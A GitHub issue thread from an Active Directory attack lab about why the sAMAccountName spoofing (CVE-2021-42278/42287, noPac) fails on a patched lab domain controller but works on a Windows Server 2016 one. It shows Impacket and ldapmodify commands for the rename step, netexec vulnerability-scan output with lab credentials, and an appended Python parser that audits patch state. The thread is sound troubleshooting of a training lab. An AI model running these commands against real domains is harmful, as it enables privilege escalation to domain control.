Patch SamAccountName [CVE-2021-42287] #145

Closed
AlgunaPseudo opened this issue Nov 19, 2023 · 4 comments

@AlgunaPseudo

Hi,

It would appear that the SamAccountName vulnerability is no longer exploitable on DC02. I've tried to exploit it with Impacket pull requests (fortra/impacket#1202 and fortra/impacket#1224) and also with ldapmodify and in both cases I get an error 00000523 (https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e -> make sure sAMAccountName ends with '$').

Via Impacket:

$ python3 renameMachine.py -current-name 'samaccountname$' -new-name 'winterfell' -dc-ip 'winterfell.north.sevenkingdoms.local' north.sevenkingdoms.local/jon.snow:iknownothing
[...]

[*] Modifying attribute (sAMAccountName) of object (CN=samaccountname,CN=Computers,DC=north,DC=sevenkingdoms,DC=local): (samaccountname$) -> (winterfell)
[*] New sAMAccountName does not end with '$' (attempting CVE-2021-42278)
[-] Server probably patched against CVE-2021-42278

Via Ldapsearch:

$ cat modify_samaccountname.ldif
dn: CN=samaccountname,CN=Computers,DC=north,DC=sevenkingdoms,DC=local
changetype: modify
replace: sAMAccountName
sAMAccountName: winterfell

$ ldapmodify -x -H ldap://192.168.10.11 -D "jon.snow@north.sevenkingdoms.local" -w iknownothing -f modify_samaccountname.ldif
modifying entry "CN=samaccountname,CN=Computers,DC=north,DC=sevenkingdoms,DC=local"
ldap_modify: Other (e.g., implementation specific) error (80)
	additional info: 00000523: SysErr: DSID-031A1242, problem 22 (Invalid argument), data 0

Why DC02? Because this is the example used in mayfly277's write-up.

@Mayfly277
Collaborator

I just redid the attack path by copy/pasting the commands from my blog and it works well on a fresh install.

Could you try a TGT PAC size test with netexec on your instance?

I'm closing this as it seems to be an issue on your side.

@AlgunaPseudo
Author

Hi Mayfly,

The command output shows me that the PAC cannot be affected by CVE-2021-42278:

$ netexec smb winterfell.north.sevenkingdoms.local -u jon.snow -p iknownothing -d north.sevenkingdoms.local -M nopac
SMB         192.168.10.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.10.11   445    WINTERFELL       [+] north.sevenkingdoms.local\jon.snow:iknownothing 
NOPAC       192.168.10.11   445    WINTERFELL       TGT with PAC size 1743
NOPAC       192.168.10.11   445    WINTERFELL       TGT without PAC size 1743

I hadn't specified it, but my lab was set up on Proxmox (following your doc). Perhaps there's a difference with the lab set up locally via Vagrant?

@Mayfly277
Collaborator

Sad :/, certainly the image you took (or the link I provided) for setting up the lab is more recent and patched. IMO you can try on essos to see if it works.

@AlgunaPseudo
Author

Indeed, it works on essos!

$ netexec smb meereen.essos.local -u khal.drogo -p horse -d essos.local -M nopac
SMB         192.168.10.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB         192.168.10.12   445    MEEREEN          [+] essos.local\khal.drogo:horse 
NOPAC       192.168.10.12   445    MEEREEN          TGT with PAC size 1465
NOPAC       192.168.10.12   445    MEEREEN          TGT without PAC size 708
NOPAC       192.168.10.12   445    MEEREEN          
NOPAC       192.168.10.12   445    MEEREEN          VULNERABLE
NOPAC       192.168.10.12   445    MEEREEN          Next step: https://github.com/Ridter/noPac

(thank you Microsoft for not patching Windows Server 2016)

Thanks for your feedback
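
Added example (not part of the thread and not netexec's own code): a Python sketch for auditing patch state across domain controllers from saved `-M nopac` output, using the thread's reading that equal TGT sizes with and without a PAC mean the DC is patched. The function name `classify` and the verdict labels are assumptions; the sample lines are copied from the two runs quoted above.

```python
import re
from collections import defaultdict

# Sample input: NOPAC lines copied from the two netexec runs quoted in this thread.
SAMPLE = """\
NOPAC       192.168.10.11   445    WINTERFELL       TGT with PAC size 1743
NOPAC       192.168.10.11   445    WINTERFELL       TGT without PAC size 1743
NOPAC       192.168.10.12   445    MEEREEN          TGT with PAC size 1465
NOPAC       192.168.10.12   445    MEEREEN          TGT without PAC size 708
NOPAC       192.168.10.12   445    MEEREEN          VULNERABLE
"""

# One size line: module tag, IP, port, host name, then the measured TGT size.
SIZE_LINE = re.compile(
    r"^NOPAC\s+(?P<ip>\S+)\s+\d+\s+(?P<host>\S+)\s+"
    r"TGT (?P<kind>with|without) PAC size (?P<size>\d+)\s*$"
)

def classify(output):
    """Return {host: {"ip", "with", "without", "verdict"}} from nopac output."""
    sizes = defaultdict(dict)
    for line in output.splitlines():
        m = SIZE_LINE.match(line)
        if m:  # banner, login and VULNERABLE lines are ignored on purpose
            sizes[(m["host"], m["ip"])][m["kind"]] = int(m["size"])

    report = {}
    for (host, ip), s in sizes.items():
        if "with" not in s or "without" not in s:
            verdict = "incomplete"   # one of the two measurements is missing
        elif s["with"] == s["without"]:
            verdict = "patched"      # DC returned a PAC even when asked not to
        else:
            verdict = "unpatched"    # ticket shrank, so the PAC was omitted
        report[host] = {"ip": ip, **s, "verdict": verdict}
    return report

if __name__ == "__main__":
    for host, row in classify(SAMPLE).items():
        print(host, row["ip"], row.get("with"), row.get("without"), row["verdict"])
```

Deriving the verdict from the two sizes rather than from the `VULNERABLE` line means a truncated log is reported as `incomplete` instead of being counted as patched.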
